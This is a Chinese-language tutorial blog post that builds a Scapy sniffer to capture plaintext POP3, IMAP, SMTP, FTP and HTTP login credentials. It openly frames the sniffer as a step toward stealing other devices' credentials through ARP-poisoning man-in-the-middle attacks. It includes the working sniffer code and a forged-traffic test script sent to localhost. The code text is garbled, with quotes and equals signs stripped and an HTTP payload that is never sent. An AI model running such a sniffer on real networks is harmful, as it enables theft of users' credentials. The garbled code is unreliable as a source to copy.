今天我们将编写一个非常简单的嗅探器来捕捉主流邮箱协议SMTP、POP3和IMAP的身份凭证。之后用这个嗅探器配合基于ARP投毒的中间人MITM攻击我们就能窃取网络中其他设备的身份凭证。本文探讨基于Python Scapy的底层网络流量操作机制。文章剖析IP/TCP协议头部定制封装及控制标志位原理演示ARP投毒实现并详述针对POP3、FTP等明文协议的凭证嗅探与流量模拟验证过程。文章目录前置准备Scapy 的主要用途BPF(Wireshark语法)捕捉主流邮箱协议测试脚本伪造流量演示代码解释参数作用解析总结前置准备Scapy 是 Python 中最强大、最灵活的网络数据包操作库。它的核心设计理念是让用户能够绕过操作系统的网络栈直接在底层自由组合不同网络协议层的模块像搭积木一样构造出任何形态的报文。Scapy 的主要用途流量分析与抓包类似 Wireshark 和 tcpdump可以使用sniff()函数实时捕获网络流量或读取/写入.pcap文件非常适合提取流量特征进行安全分析。网络扫描与发现发送自定义的探测包如 ICMP、TCP SYN来发现存活主机、探测开放端口、进行操作系统指纹识别。网络攻击与渗透测试构造畸形或伪造的数据包来执行各类攻击例如 ARP 投毒如上一章所示、DNS 欺骗、SYN 泛洪、VLAN 跳跃等。安全防御与测试作为防守方常用于回放特定的攻击流量PCAP replay以验证防火墙策略或入侵检测系统IDS的告警规则是否生效。默认情况下Scapy 会自动计算校验和Checksum并填补必要的默认字段我们只需要关注想修改的字段即可。组合公式数据链路层 / 网络层 / 传输层 / 应用层数据举例理解packet Ether() / IP(dst8.8.8.8) / TCP(dport80) / GET / HTTP/1.0\r\n\r\n(这行代码直接构造了一个发往 8.8.8.8 80端口的 HTTP GET 请求包含了以太网帧、IP头部、TCP头部和 HTTP 文本)这里我们给大家简单介绍一下Scapy语法以及用途# 最简单的数据包内容嗅探器sniff(filter,ifaceany,prnfunction,countN)1filter参数允许我们指定一个BPFBerkeley Packet Filter包过滤器用于过滤Scapy嗅探到的数据包也可以将此参数留空表示嗅探所有的数据包比如想嗅探所有的HTTP包可以指定BPF为tcp port 802iface参数用于指定嗅探对应的网卡可以使用命令ipconfig /all进行查看3prn参数用于指定一个回调函数每当遇到符合过滤条件的数据包时嗅探器就会将该数据包传给这个回调函数多说无益给大家看个例子fromscapy.allimportsniffdefpacket_filter(packet):print(packet.show())# 这里因为只接受一个包所以也不用做什么过滤defmain():sniff(prnpacket_filter,count1)if__name____main__:main()下面是抓取第一个包的信息###[ Ethernet ]###dst00:a1:3d:67:de:0a src78:af:08:7e:0c:e8typeIPv4###[ IP ]###version4ihl5tos0x0 len124id12820flagsfrag0ttl128protoudp chksum0x0 src192.168.1.169 dst124.88.192.90\options\###[ UDP ]###sport51530dport35513len104chksum0xff7d###[ Raw ]###loadb\x00\x01\x00L!\x12\xa4B752AqQVeahT9\x00\x06\x00\tM0Oz:I2p4\x00\x00\x00\xc0W\x00\x04\x00\x00\x03\xe7\x80)\x00\x08\xc7D\xe0\xd6\x94\x1f\x18\x00$\x00\x04n\x00\x1e\xff\x00\x08\x00\x14h\xf9MK\xed\xaa\x83\xc9\xafa\x11\x1f\xb2r\x12\xfe\x81\x98f\x83\x80(\x00\x04A\xf9\xdbFNone可以看到收到网络上的第一个数据包之后回调函数就会调用内置的packet.show函数展示数据包的内容还会解析一部分协议信息。这个show函数是调试程序的好帮手可以用它检查捕获到的数据包是不是你想要的。BPF(Wireshark语法)在接下来的例子中我们将设置一个包过滤器确保嗅探器只展示我们感兴趣的包。我们会使用BPF语法也被称为Wireshark风格的语法来编写过滤器。BPF语法组成描述词(源/目标IP) 数据流方向 使用协议举例指定目标IP地址ip.dst 192.168.31.168指定源IP地址ip.src 192.168.31.61排查特定服务的通信tcp.port 80 || tcp.port 443特定的请求方法http.request.method “POST”识别出端口扫描如 SYN Scantcp.flags.syn 1 tcp.flags.ack 0如果大家还想了解如何使用wireshark在生活中的使用可以看看下列文章Webshell流量分析——玄机冰蝎Behinder2.0和3.0流量对比溯源详细解析应急响应挑战杯日志流量分析部分玄机——Wireshark流量分析案例篇手把手教学基础篇具体可以看该专栏等保应急响应靶场捕捉主流邮箱协议接下来我们将添加过滤器和回调函数代码有针对性地捕获和邮箱账号认证相关的数据比如明文数据的账号密码等测试脚本下面我们就对上述代码做一个简单拓展fromscapy.allimportsniff,Rawfromscapy.layers.inetimportIP,TCPdefpacket_callback(packet):# 确保数据包包含 TCP 层且带有应用层载荷 (Raw 层)ifpacket.haslayer(TCP)andpacket.haslayer(Raw):# 将载荷的字节流解码为字符串忽略无法解码的字符payloadbytes(packet[TCP].payload).decode(utf-8,errorsignore)ifuserinpayload.lower()orpassinpayload.lower():print(f[*] 发现目标 IP:{packet[IP].dst})print(f[*] 截获凭证:{payload.strip()}\n)defmain():print([*] 嗅探器已启动正在监听 110, 25, 143 端口...)# 建议测试时把 count5 暂时去掉让它持续监听# sniff(filtertcp port 110 or tcp port 25 or tcp port 143, prnpacket_callback, store0)# 把 filter 扩展或者为了本地测试方便直接去掉 filter 监听所有 tcp 端口sniff(filtertcp port 110 or tcp port 21 or tcp port 143 or tcp port 80 or tcp port 23,prnpacket_callback,store0)if__name____main__:main()我们修改了sniff函数这个过滤器只会监听常用邮件协议端口上接收到的流量也就是110POP3、143IMAP和25SMTP等端口还增加了一个新参数store把它设为0以后Scapy就不会将任何数据包保留在内存里。随后当回调函数packet_callback被调用时我们会检查收到的数据包里有没有数据载荷有没有USER或PASS这两条邮件协议命令。如果发现了任何认证数据就把服务器地址和具体的认证数据打印出来伪造流量演示这里为了方便演示我们还可以编写一个发送流量的脚本fromscapy.allimportsniff,sendfromscapy.layers.inetimportIP,TCPimporttimedefsend_fake_traffic():target127.0.0.1print(f[*] 正在发送各种伪造协议流量...\n)# # 1. POP3 (端口 110)print(f[*] 正在发送POP3伪造流量....)send(IP(dsttarget/TCP(sport10000,dport110,flagsPA)/username:tim\r\n,verboseFalse))send(IP(srctarget)/TCP(sport10000,dport110,flagsPA)/Password:123456\r\n,verboseFalse)# 2. FTP (端口 21)print([*] 发送 FTP 流量...)send(IP(dsttarget)/TCP(sport10002,dport21,flagsPA)/USER leco_ftp\r\n,verboseFalse)send(IP(dsttarget)/TCP(sport10002,dport21,flagsPA)/PASS ftp_secret_456\r\n,verboseFalse)time.sleep(0.5)# 3. IMAP (端口 143) - 通常是在一行内同时发送账号和密码print([*] 发送 IMAP 流量...)send(IP(dsttarget)/TCP(sport10003,dport143,flagsPA)/A001 LOGIN leco_user imap_secret_789\r\n,verboseFalse)time.sleep(0.5)# 4. HTTP POST 表单 (端口 80) - 模拟网页端未加密的登录提交print(f[*] 发送HTTP POST表单...)http_payload(POST /login.php HTTP 1.1/\r\nHost: test.local\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nusernamelecopassjfdaf^!jdid_type0\r\n)print(f[*] 所有流量均已发送完毕..)if__name____main__:send_fake_traffic()代码解释这段代码的核心在于使用 Python 库 Scapy 构造并发送了一个网络数据包。我们将分析其核心语句pkt_user IP(dsttarget_ip) / TCP(sport12345, dport110, flagsPA) / USER leco_admin\r\n在网络传输中数据是被逐层封装的。Scapy 的语法完美对应了这一模型------------------------------------------------------------- | 以太网帧 (Ethernet Frame) | | (如果未明确指定Scapy 会在调用 send() 时自动填充此层) | |-------------------------------------------------------------| | IP 报文头 (IP Header) | - IP(dsttarget_ip) | - 源IP (自动获取) | | - 目标IP (127.0.0.1) | |-------------------------------------------------------------| | TCP 报文头 (TCP Header) | - TCP(sport12345, dport110, flagsPA) | - 源端口 (12345: 客户端随机端口) | | - 目标端口 (110: POP3 协议默认端口) | | - 控制标志 (Flags: PSH ACK) | |-------------------------------------------------------------| | 应用层数据 (Payload/Data) | - USER leco_admin\r\n | - 协议: POP3 | | - 内容: 提交用户名指令 | -------------------------------------------------------------参数作用解析IP(dsttarget_ip)工作在网络层OSI 模型第三层。负责将数据包路由到目标主机。dst(Destination)目标 IP 地址。TCP(sport12345, dport110, flagsPA)工作在传输层OSI 模型第四层。负责端到端的可靠通信。sport(Source Port)源端口标识发送方的应用程序。dport(Destination Port)目的端口标识接收方的服务程序110 为 POP3 服务。flagsTCP 标志位用于控制连接状态。USER leco_admin\r\n工作在应用层OSI 模型第七层。这是实际传输的有效载荷Payload。符合 POP3 协议规范的命令格式要求以\r\n(CRLF) 结尾。/操作符Scapy 重载的层叠操作符负责将上述各层结构组合成一个完整的数据包。flags是 TCP 包里的控制位:S SYN 建立连接A ACK 确认收到P PSH 推送数据马上把数据交给应用层F FIN 关闭连接R RST 强制断开随后我们首先运行嗅探脚本随后执行伪造流量脚本最后我们可以i得到结果注意如果是本地进行实验的话需要做如下改动才能抓到我们发送到伪造流量在一台 Windows 机器上往这台机器自己的物理 IP 地址发包时Windows 的网络协议栈会内部处理掉并不会得到结果所以要在单台 Windows 机器上完成测试最简单的方法就是不要把目标 IP 设为自己把它设为你的路由器网关IP只要把包发给网关这个数据包就必须离开本地电脑通过物理网卡流向网线/WiFi总结本章我们简单了解了如何利用Scapy模块对特定协议进行过滤下一篇文章我们将进行APR中间人攻击来修改受害机器的网关MAC地址